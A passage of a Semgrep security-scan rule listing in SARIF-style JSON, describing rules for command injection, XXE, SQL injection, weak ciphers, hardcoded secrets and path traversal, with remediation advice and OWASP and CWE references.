prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request)\n - [https://owasp.org/www-community/attacks/Command_Injection](https://owasp.org/www-community/attacks/Command_Injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection)\n - [https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection](https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","id":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","name":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","id":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","name":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","id":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","name":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Oracle update is not restricted in $F()"},"help":{"markdown":"Oracle update is not restricted in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control)\n - [https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0](https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0)\n","text":"Oracle update is not restricted in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","id":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","name":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"help":{"markdown":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use)\n - [https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html](https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html)\n - [https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation](https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation)\n - [http://phrack.org/papers/escaping_the_java_sandbox.html](http://phrack.org/papers/escaping_the_java_sandbox.html)\n","text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"helpUri":"https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use","id":"java.lang.security.do-privileged-use.do-privileged-use","name":"java.lang.security.do-privileged-use.do-privileged-use","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.do-privileged-use.do-privileged-use"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string","id":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","name":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","id":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","name":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli)\n - [https://www.npmjs.com/package/mssql](https://www.npmjs.com/package/mssql)\n","text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","id":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","name":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"help":{"markdown":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","id":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","name":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","properties":{"precision":"very-high","tags":["CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crlf-injection-logs.crlf-injection-logs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"help":{"markdown":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation)\n - [https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib](https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib)\n","text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"helpUri":"https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation","id":"python.requests.security.disabled-cert-validation.disabled-cert-validation","name":"python.requests.security.disabled-cert-validation.disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.requests.security.disabled-cert-validation.disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","id":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","name":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"help":{"markdown":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","id":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","name":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"help":{"markdown":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","id":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","name":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"help":{"markdown":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag)\n - [https://owasp.org/www-community/controls/SecureCookieAttribute](https://owasp.org/www-community/controls/SecureCookieAttribute)\n","text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","id":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","name":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal","id":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","name":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-path-traversal.laravel-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","id":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","name":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user 